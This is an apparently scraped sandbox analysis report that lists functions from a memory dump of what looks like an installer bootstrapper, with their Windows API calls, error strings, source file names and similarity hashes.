Failed to allocate regid folder path., xrefs: 00C96097

Memory Dump Source

Source File: 00000001.00000002.3582108218.0000000000C91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C90000, based on PE: true

Associated: 00000001.00000002.3582060680.0000000000C90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582170095.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582232594.0000000000CE6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582273539.0000000000CEC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c90000_UNK_.jbxd

Similarity

API ID: DirectoryFolderPathRemove
String ID: Failed to allocate regid folder path.$Failed to find local %hs appdata directory.$per-machine$per-user
API String ID: 293476170-2037127396
Opcode ID: 09ab3765df82bdb6796f655e06447cd22718b4d01e4a57069e83bc483d24d64a
Instruction ID: 2dea675be5b3a1554b02b1efdc941a46f28b22230b701dc30420418c883504a5
Opcode Fuzzy Hash: 09ab3765df82bdb6796f655e06447cd22718b4d01e4a57069e83bc483d24d64a
Instruction Fuzzy Hash: F2217FB1D00229FFCF11AFA4CDC9E9DBBB8EF04704B20906AF415A2191D7319B50EB94

Function 00CC5FAE Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 85fileCOMMON

Download Yara Rule

APIs

CopyFileW.KERNEL32(00000000,00000000,00000000,?,?,00000000,?,00CC60BB,00000000,00000000,?,?,?,00CA7B8D,00000000,?), ref: 00CC5FC8
GetLastError.KERNEL32(?,00CC60BB,00000000,00000000,?,?,?,00CA7B8D,00000000,?,00000001,00000003,000007D0,?,?,00CA9CB8), ref: 00CC5FD6
CopyFileW.KERNEL32(00000000,00000000,?,00000000,00000000,?,00CC60BB,00000000,00000000,?,?,?,00CA7B8D,00000000,?,00000001), ref: 00CC603A
GetLastError.KERNEL32(?,00CC60BB,00000000,00000000,?,?,?,00CA7B8D,00000000,?,00000001,00000003,000007D0,?,?,00CA9CB8), ref: 00CC6044

Strings

fileutil.cpp, xrefs: 00CC6064

Memory Dump Source

Source File: 00000001.00000002.3582108218.0000000000C91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C90000, based on PE: true

Associated: 00000001.00000002.3582060680.0000000000C90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582170095.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582232594.0000000000CE6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582273539.0000000000CEC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c90000_UNK_.jbxd

Similarity

API ID: CopyErrorFileLast
String ID: fileutil.cpp
API String ID: 374144340-2967768451
Opcode ID: 82ddb748b40fa8bcdd1aa345d071029ae198ca432fc4a9a8b6a7cc1e7136aa25
Instruction ID: 839673c31360e17b0ba5d696386cff2bbfc2193b12e8266110725e635733887b
Opcode Fuzzy Hash: 82ddb748b40fa8bcdd1aa345d071029ae198ca432fc4a9a8b6a7cc1e7136aa25
Instruction Fuzzy Hash: A72108B2200216DBEF218AA6CD41F3F3668EF847A2F24013EF864E6250DB35CD819359

Function 00CC7E9C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 84encryptionCOMMON

Download Yara Rule

APIs

CertGetCertificateContextProperty.CRYPT32(?,00CA860E,00000000,00000003), ref: 00CC7EB8
GetLastError.KERNEL32(?,00CA860E,?,00000003,00AAC56B,?), ref: 00CC7EBE
CertGetCertificateContextProperty.CRYPT32(?,00CA860E,00000000,00000003), ref: 00CC7F21
GetLastError.KERNEL32(?,00CA860E,?,00000003,00AAC56B,?), ref: 00CC7F27

Strings

certutil.cpp, xrefs: 00CC7EE0, 00CC7F08, 00CC7F49

Memory Dump Source

Source File: 00000001.00000002.3582108218.0000000000C91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C90000, based on PE: true

Associated: 00000001.00000002.3582060680.0000000000C90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582170095.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582232594.0000000000CE6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582273539.0000000000CEC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c90000_UNK_.jbxd

Similarity

API ID: CertCertificateContextErrorLastProperty
String ID: certutil.cpp
API String ID: 980632616-2692845373
Opcode ID: 24eacdd634ed09228cd5bdada10f436344d027c5aa888e31e0aeb9b9f9298576
Instruction ID: a4ccd8c282e9d38b0a8b1aa2ab1caf77f300c18c9a98053e4516efd011d4e141
Opcode Fuzzy Hash: 24eacdd634ed09228cd5bdada10f436344d027c5aa888e31e0aeb9b9f9298576
Instruction Fuzzy Hash: B721507234430BABEB119AE6CDC6F6A36ADDF44754F10423DF914DB151EAB9CE00AB60

Function 00CC7F7B Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 84COMMON

Download Yara Rule

APIs

QueryServiceConfigW.ADVAPI32(?,00000000,00000000,?,00000001,00000000,?,?,?,?,00CAEFBF,?,?), ref: 00CC7F9A
GetLastError.KERNEL32(?,?,?,00CAEFBF,?,?), ref: 00CC7FAA

Part of subcall function 00CC2955: GetProcessHeap.KERNEL32(?,?,?,00CC0FA3,?,00000001,?,00000000,00000000,?,?,?,00CBFD43,?,?,00000000), ref: 00CC2966
Part of subcall function 00CC2955: RtlAllocateHeap.NTDLL(00000000,?,00CC0FA3,?,00000001,?,00000000,00000000,?,?,?,00CBFD43,?,?,00000000,00000000), ref: 00CC296D

QueryServiceConfigW.ADVAPI32(?,00000000,?,?,?,00000001,?,?,?,00CAEFBF,?,?), ref: 00CC7FE3
GetLastError.KERNEL32(?,?,?,00CAEFBF,?,?), ref: 00CC7FE9

Strings

svcutil.cpp, xrefs: 00CC7FCC, 00CC8007

Memory Dump Source

Source File: 00000001.00000002.3582108218.0000000000C91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C90000, based on PE: true

Associated: 00000001.00000002.3582060680.0000000000C90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582170095.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582232594.0000000000CE6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582273539.0000000000CEC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c90000_UNK_.jbxd

Similarity

API ID: ConfigErrorHeapLastQueryService$AllocateProcess
String ID: svcutil.cpp
API String ID: 355237494-1746323212
Opcode ID: a5ba670dcc3f6e618eaafa5a76d2f0ec3f3ad3d4724fb8b93068237f8823fc28
Instruction ID: 6f559bd584b5b9f4982ae5b0d5591db35962534290f771aa6f03d80beedc26ed
Opcode Fuzzy Hash: a5ba670dcc3f6e618eaafa5a76d2f0ec3f3ad3d4724fb8b93068237f8823fc28
Instruction Fuzzy Hash: 28215071A4030ABEEB109AD5CCC1FAF7AACEB04794F11013DF610E6151EAB5DE48AA50

Function 00C9F3E0 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 81COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00C9F3F7

Strings

Failed to find package: %ls, xrefs: 00C9F477
Failed to read action., xrefs: 00C9F43F
Failed to read package id from message buffer., xrefs: 00C9F41F
Failed to execute package provider action., xrefs: 00C9F496

Memory Dump Source

Source File: 00000001.00000002.3582108218.0000000000C91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C90000, based on PE: true

Associated: 00000001.00000002.3582060680.0000000000C90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582170095.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582232594.0000000000CE6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582273539.0000000000CEC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c90000_UNK_.jbxd

Similarity

API ID: _memset
String ID: Failed to execute package provider action.$Failed to find package: %ls$Failed to read action.$Failed to read package id from message buffer.
API String ID: 2102423945-384206569
Opcode ID: b8ff5745a9721ac44bdf137fb01be9c9ed6127c6ac25b9723f798b7912d99725
Instruction ID: c803f6a31a56e35ff700b8aede2d6aaf2c6c6301ff11a249fe5c4a106ccbb257
Opcode Fuzzy Hash: b8ff5745a9721ac44bdf137fb01be9c9ed6127c6ac25b9723f798b7912d99725
Instruction Fuzzy Hash: 23215772D00569BBCF12EAD0DC4AFEEBB78AB04720F104169F900F6191E735DB55AB91

Function 00CC8175 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80networkCOMMON

Download Yara Rule

APIs

HttpQueryInfoW.WININET(?,?,00000001,00000000,?), ref: 00CC81C9
GetLastError.KERNEL32(?,00CB72DB,00000000,00000033,?,00000000,00000013,00000000,?,?,?,00CB7457,00000000,?,00000000,?), ref: 00CC81CF
HttpQueryInfoW.WININET(?,?,00000001,00000000,?), ref: 00CC8202
GetLastError.KERNEL32(?,00CB72DB,00000000,00000033,?,00000000,00000013,00000000,?,?,?,00CB7457,00000000,?,00000000,?), ref: 00CC8208

Strings

inetutil.cpp, xrefs: 00CC8229

Memory Dump Source

Source File: 00000001.00000002.3582108218.0000000000C91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C90000, based on PE: true

Associated: 00000001.00000002.3582060680.0000000000C90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582170095.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582232594.0000000000CE6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582273539.0000000000CEC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c90000_UNK_.jbxd

Similarity

API ID: ErrorHttpInfoLastQuery
String ID: inetutil.cpp
API String ID: 4218848986-2900720265
Opcode ID: f17ded730a7869691e3bc2c8dce3a3a1489999882975d923f6ca3cf50c8427e5
Instruction ID: 0d99e1fdeb0db7b7df3e9a60903c1b3c4325ce3fa7af0237b98757e13ca4ee34
Opcode Fuzzy Hash: f17ded730a7869691e3bc2c8dce3a3a1489999882975d923f6ca3cf50c8427e5
Instruction Fuzzy Hash: 00213E71A0060AFADB019FD5DC89FAFB7ADEF54350B200429F650D6110EB71DF45AB60

Function 00CC7188 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79COMMON

Download Yara Rule

APIs

GetCurrentDirectoryW.KERNEL32(?,00000000,00000001,00000009,00000000,?,?,?,00CA201A,00000001,00000000,Setup,00000000,log,0000000D,00000000), ref: 00CC71CF
GetLastError.KERNEL32(?,?,?,00CA201A,00000001,00000000,Setup,00000000,log,0000000D,00000000,00000000,?,?,?), ref: 00CC71D7
GetCurrentDirectoryW.KERNEL32(00000000,?,?,00000000,?,?,?,00CA201A,00000001,00000000,Setup,00000000,log,0000000D,00000000,00000000), ref: 00CC7219
GetLastError.KERNEL32(?,?,?,00CA201A,00000001,00000000,Setup,00000000,log,0000000D,00000000,00000000,?,?,?), ref: 00CC721F

Strings

dirutil.cpp, xrefs: 00CC7249

Memory Dump Source

Source File: 00000001.00000002.3582108218.0000000000C91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C90000, based on PE: true

Associated: 00000001.00000002.3582060680.0000000000C90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582170095.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582232594.0000000000CE6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582273539.0000000000CEC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c90000_UNK_.jbxd

Similarity

API ID: CurrentDirectoryErrorLast
String ID: dirutil.cpp
API String ID: 152501406-2193988115
Opcode ID: b6d16ef8c810ae7c2fd85e3d4c78815408a7ecb1d1bc358d8a02484001a3c2fe
Instruction ID: 5e8d1d4fbf48c86fd8385ada4311e1b689d058141e49d51a0c961b0f5866d33a
Opcode Fuzzy Hash: b6d16ef8c810ae7c2fd85e3d4c78815408a7ecb1d1bc358d8a02484001a3c2fe
Instruction Fuzzy Hash: A7216AB1A0421AEB9B12CBE5CD45FAEBBB8EF45740F20426EF514E6110E674DB40AF60

Function 00CB13DA Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 79registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00CC3DFC: RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,00000000,00000001,00000000,00000000,?,00CC7B1F,80000002,00000000,00020019,00000000,SOFTWARE\Policies\,00000000,00000000), ref: 00CC3E10

CompareStringW.KERNEL32(00000000,00000001,?,000000FF,?,000000FF,?,?,?,-80000001,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,00020019,?,?,?,00000000), ref: 00CB1459
RegCloseKey.ADVAPI32(?,-80000001,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,00020019,?,?,?,00000000,?,?,?,?,00000001,00000000), ref: 00CB14A3

Strings

Failed to open uninstall registry key., xrefs: 00CB1422
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall, xrefs: 00CB13F6
Failed to enumerate uninstall key for related bundles., xrefs: 00CB147D

Memory Dump Source

Source File: 00000001.00000002.3582108218.0000000000C91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C90000, based on PE: true

Associated: 00000001.00000002.3582060680.0000000000C90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582170095.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582232594.0000000000CE6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582273539.0000000000CEC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c90000_UNK_.jbxd

Similarity

API ID: CloseCompareOpenString
String ID: Failed to enumerate uninstall key for related bundles.$Failed to open uninstall registry key.$SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
API String ID: 2817536665-2531018330
Opcode ID: 236d15f3979a313a2bbba95d8ab14651d60f5a18746521569135dc491d981fef
Instruction ID: 76af37347e5c71447a944c1c3f47a5bb5fe2b311002f99634a377b4c3167b91d
Opcode Fuzzy Hash: 236d15f3979a313a2bbba95d8ab14651d60f5a18746521569135dc491d981fef
Instruction Fuzzy Hash: 26215C76900219FBCF11AFE4DC95DDEBB79AB04321F68816AFD21731A0C2314E90AB90

Function 00CC6C44 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 77COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNEL32(00000003,00000001,00000000,00000001,?,00CC616D,00000001,00000000,?,?,?,00CC6208,00000003,00000001,00000001,00000000), ref: 00CC6C52
GetLastError.KERNEL32(?,00CC616D,00000001,00000000,?,?,?,00CC6208,00000003,00000001,00000001,00000000,00000000,00000000,?,00CA786D), ref: 00CC6C60

Part of subcall function 00CC6C19: GetFileAttributesW.KERNEL32(00000003,00000000,?,00CC6C7D,00000003,00000000,?,00CC616D,00000001,00000000,?,?,?,00CC6208,00000003,00000001), ref: 00CC6C22

Part of subcall function 00CC6C44: CreateDirectoryW.KERNEL32(00000003,00000001,00000000,?,00CC616D,00000001,00000000,?,?,?,00CC6208,00000003,00000001,00000001,00000000,00000000), ref: 00CC6CDB
Part of subcall function 00CC6C44: GetLastError.KERNEL32(?,00CC616D,00000001,00000000,?,?,?,00CC6208,00000003,00000001,00000001,00000000,00000000,00000000,?,00CA786D), ref: 00CC6CE5

Strings

dirutil.cpp, xrefs: 00CC6CB1

Memory Dump Source

Source File: 00000001.00000002.3582108218.0000000000C91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C90000, based on PE: true

Associated: 00000001.00000002.3582060680.0000000000C90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582170095.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582232594.0000000000CE6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582273539.0000000000CEC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c90000_UNK_.jbxd

Similarity

API ID: CreateDirectoryErrorLast$AttributesFile
String ID: dirutil.cpp
API String ID: 925696554-2193988115
Opcode ID: cfa183f19ea24551576da2f09a8518a3d621e59b0af604eb6d6731aec43ef4d5
Instruction ID: c9a48e774023feacc82abe3c1815348dda1e4a9d801a6cb7ada00599d86556c8
Opcode Fuzzy Hash: cfa183f19ea24551576da2f09a8518a3d621e59b0af604eb6d6731aec43ef4d5
Instruction Fuzzy Hash: 1C11D375300302A6DB301B66DE45F3B36A8EFD4760F15442DF8AACA150EA39CD429360

Function 00CB4E8F Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 77synchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 00CC2955: GetProcessHeap.KERNEL32(?,?,?,00CC0FA3,?,00000001,?,00000000,00000000,?,?,?,00CBFD43,?,?,00000000), ref: 00CC2966
Part of subcall function 00CC2955: RtlAllocateHeap.NTDLL(00000000,?,00CC0FA3,?,00000001,?,00000000,00000000,?,?,?,00CBFD43,?,?,00000000,00000000), ref: 00CC296D

WaitForSingleObject.KERNEL32(?,000000FF), ref: 00CB4F25
ReleaseMutex.KERNEL32(?), ref: 00CB4F54
SetEvent.KERNEL32(?), ref: 00CB4F5D

Strings

NetFxChainer.cpp, xrefs: 00CB4EC9
Failed to allocate buffer., xrefs: 00CB4ED6

Memory Dump Source

Source File: 00000001.00000002.3582108218.0000000000C91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C90000, based on PE: true

Associated: 00000001.00000002.3582060680.0000000000C90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582170095.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582232594.0000000000CE6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582273539.0000000000CEC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c90000_UNK_.jbxd

Similarity

API ID: Heap$AllocateEventMutexObjectProcessReleaseSingleWait
String ID: Failed to allocate buffer.$NetFxChainer.cpp
API String ID: 944053411-3611226795
Opcode ID: 25ac5a4813103a85bde9fcb266caf7a48ba4b85074c2dfa01adabb52822d6cb5
Instruction ID: 39164ce9b2e01e135edffb1d3d319082eba3fb541e75c5f024e3bda78a36cfa3
Opcode Fuzzy Hash: 25ac5a4813103a85bde9fcb266caf7a48ba4b85074c2dfa01adabb52822d6cb5
Instruction Fuzzy Hash: 0E21BF71900204EFCB00DFA4C849F9EBBB5FB45314F208069E915AF292CB769E02DBA0

Function 00C92F4A Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 74fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,?,?,00000000,?,80070057,F0000002), ref: 00C92FA0

Strings

Failed to write message type to pipe., xrefs: 00C92FE3
Failed to allocate message to write., xrefs: 00C92F75
pipe.cpp, xrefs: 00C92FD9

Memory Dump Source

Source File: 00000001.00000002.3582108218.0000000000C91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C90000, based on PE: true

Associated: 00000001.00000002.3582060680.0000000000C90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582170095.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582232594.0000000000CE6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582273539.0000000000CEC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c90000_UNK_.jbxd

Similarity

API ID: FileWrite
String ID: Failed to allocate message to write.$Failed to write message type to pipe.$pipe.cpp
API String ID: 3934441357-1996674626
Opcode ID: cb7f547ea7f5195896000ed029eaa88e68149e3b6467c3b8369b665f2ea5810e
Instruction ID: ee877eaee93abdcde93724bb9982145ea3f1e6ac12fcd6fb0167db37cd00b48d
Opcode Fuzzy Hash: cb7f547ea7f5195896000ed029eaa88e68149e3b6467c3b8369b665f2ea5810e
Instruction Fuzzy Hash: D711AF72A44219FEDF119FD4DD89EEEBBB9EB44300F20006AF845A2141EA719E50AB60

Function 00CB7516 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 73networktimeCOMMON

Download Yara Rule

APIs

Part of subcall function 00CB733E: InternetCloseHandle.WININET(00000000), ref: 00CB7363
Part of subcall function 00CB733E: InternetCloseHandle.WININET(00000000), ref: 00CB7371
Part of subcall function 00CB733E: InternetConnectW.WININET(?,00000000,?,00000000,?,?,00000000,00000000), ref: 00CB73D0
Part of subcall function 00CB733E: lstrlenW.KERNEL32(00000000), ref: 00CB73FB
Part of subcall function 00CB733E: InternetSetOptionW.WININET(00000000,0000002B,00000000,00000000), ref: 00CB7408
Part of subcall function 00CB733E: lstrlenW.KERNEL32(00000001), ref: 00CB7411
Part of subcall function 00CB733E: InternetSetOptionW.WININET(00000000,0000002C,00000001,00000000), ref: 00CB741A

GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,00000000,000000FF,?,00000000,HEAD,00000000,00000000,?,00000000,?,?), ref: 00CB75A8
InternetCloseHandle.WININET(?), ref: 00CB75BE
InternetCloseHandle.WININET(00000000), ref: 00CB75C8

Strings

Failed to connect to URL: %ls, xrefs: 00CB7563
HEAD, xrefs: 00CB7539

Memory Dump Source

Source File: 00000001.00000002.3582108218.0000000000C91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C90000, based on PE: true

Associated: 00000001.00000002.3582060680.0000000000C90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582170095.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582232594.0000000000CE6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582273539.0000000000CEC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c90000_UNK_.jbxd

Similarity

API ID: Internet$CloseHandle$OptionTimelstrlen$ConnectFileSystem
String ID: Failed to connect to URL: %ls$HEAD
API String ID: 1677864904-290634988
Opcode ID: 575d147fb99d659d75e17c4b26f8f2290b61a81717850dfb467265c24917efb2
Instruction ID: 41e18bbb7169e2d95c2bd7b3478b078f31a5e1f69f543955b250382eae83593f
Opcode Fuzzy Hash: 575d147fb99d659d75e17c4b26f8f2290b61a81717850dfb467265c24917efb2
Instruction Fuzzy Hash: 12211471900219EFCF129FE5CC81ADEBFB9FF48750F104166F915A2220D7719A65EBA0

Function 00CC59D0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 72memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(?), ref: 00CC59E3
VariantInit.OLEAUT32(?), ref: 00CC59EF
VariantClear.OLEAUT32(?), ref: 00CC5A63
SysFreeString.OLEAUT32(00000000), ref: 00CC5A6E

Part of subcall function 00CC55B3: SysAllocString.OLEAUT32(?), ref: 00CC55C8

Strings

`<u, xrefs: 00CC5A6E

Memory Dump Source

Source File: 00000001.00000002.3582108218.0000000000C91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C90000, based on PE: true

Associated: 00000001.00000002.3582060680.0000000000C90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582170095.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582232594.0000000000CE6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582273539.0000000000CEC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c90000_UNK_.jbxd

Similarity

API ID: String$AllocVariant$ClearFreeInit
String ID: `<u
API String ID: 347726874-3367579956
Opcode ID: 699a782ba856d85a0548abac47fb77f3c75ada26ad97c874b23bbaedd5b7005b
Instruction ID: a2362910cc36e32d45fe5718aa25bddd9bd98439e9382ebd6d89c0221d41dc80
Opcode Fuzzy Hash: 699a782ba856d85a0548abac47fb77f3c75ada26ad97c874b23bbaedd5b7005b
Instruction Fuzzy Hash: BF212F71A00619AFCB10DFE5C888FBEBBB9AF48755F044558E915EB211DB30EE81DB90

Function 00CC80BA Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 70timenetworkCOMMON

Download Yara Rule

APIs

HttpQueryInfoW.WININET(00000000,4000000B,?,00000000,00000000), ref: 00CC80F9
GetLastError.KERNEL32 ref: 00CC8103
SystemTimeToFileTime.KERNEL32(?,?), ref: 00CC812C
GetLastError.KERNEL32 ref: 00CC8136

Strings

inetutil.cpp, xrefs: 00CC8158

Memory Dump Source

Source File: 00000001.00000002.3582108218.0000000000C91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C90000, based on PE: true

Associated: 00000001.00000002.3582060680.0000000000C90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582170095.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582232594.0000000000CE6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582273539.0000000000CEC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c90000_UNK_.jbxd

Similarity

API ID: ErrorLastTime$FileHttpInfoQuerySystem
String ID: inetutil.cpp
API String ID: 3487154604-2900720265
Opcode ID: c5645b9a828f852884e4944f80056929d7619cb8c1cf1dfc634d3e96ebc9a6d4
Instruction ID: edfae538c1a97238440d62b14285a8636c7fe253b9099550ea8282c5a1093f4d
Opcode Fuzzy Hash: c5645b9a828f852884e4944f80056929d7619cb8c1cf1dfc634d3e96ebc9a6d4
Instruction Fuzzy Hash: 28118472A0011AAAD7119BE9DC49FAFBBECAF05750F15053DE905E7150EA34DE0887A1

Function 00CA6FA8 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 68COMMON

Download Yara Rule

APIs

_memcpy_s.LIBCMT ref: 00CA702F

Strings

Failed to parse condition '%ls' at position: %u, xrefs: 00CA6FE2
condition.cpp, xrefs: 00CA6FCB, 00CA7013
Failed to find variable., xrefs: 00CA701D
Failed to read next symbol., xrefs: 00CA7048

Memory Dump Source

Source File: 00000001.00000002.3582108218.0000000000C91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C90000, based on PE: true

Associated: 00000001.00000002.3582060680.0000000000C90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582170095.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582232594.0000000000CE6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582273539.0000000000CEC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c90000_UNK_.jbxd

Similarity

API ID: _memcpy_s
String ID: Failed to find variable.$Failed to parse condition '%ls' at position: %u$Failed to read next symbol.$condition.cpp
API String ID: 2001391462-1605196437
Opcode ID: 6340341ef079d3c44e3c2da1252b2785c93a6012b7dd1db9a29e34c43bf8278b
Instruction ID: c0731730668066c353a1b33ba9d0eabc056a2f9056723bd2dff4f15da65fedcc
Opcode Fuzzy Hash: 6340341ef079d3c44e3c2da1252b2785c93a6012b7dd1db9a29e34c43bf8278b
Instruction Fuzzy Hash: 0F118C33288705BADB3126A8CC06F5776B5AB86B10F54063DF304D61D1FA72D900E2A2

Function 00CA7BAA Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 66COMMON

Download Yara Rule

APIs

Part of subcall function 00CC2955: GetProcessHeap.KERNEL32(?,?,?,00CC0FA3,?,00000001,?,00000000,00000000,?,?,?,00CBFD43,?,?,00000000), ref: 00CC2966
Part of subcall function 00CC2955: RtlAllocateHeap.NTDLL(00000000,?,00CC0FA3,?,00000001,?,00000000,00000000,?,?,?,00CBFD43,?,?,00000000,00000000), ref: 00CC296D

CreateWellKnownSid.ADVAPI32(00000000,00000000,00000000,00000000,00000044,00000001,00000000,00000000,20000004,?,00CA7C80,0000001A,00000000,00000000,00000000,00000000), ref: 00CA7BF6
GetLastError.KERNEL32(?,00CA7C80,0000001A,00000000,00000000,00000000,00000000,00000000), ref: 00CA7C00

Strings

Failed to create well known SID., xrefs: 00CA7C2F
cache.cpp, xrefs: 00CA7BD1, 00CA7C25
Failed to allocate memory for well known SID., xrefs: 00CA7BDD

Memory Dump Source

Source File: 00000001.00000002.3582108218.0000000000C91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C90000, based on PE: true

Associated: 00000001.00000002.3582060680.0000000000C90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582170095.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582232594.0000000000CE6000.00000004.00000001.01000000.00000005.sdmpDownload File
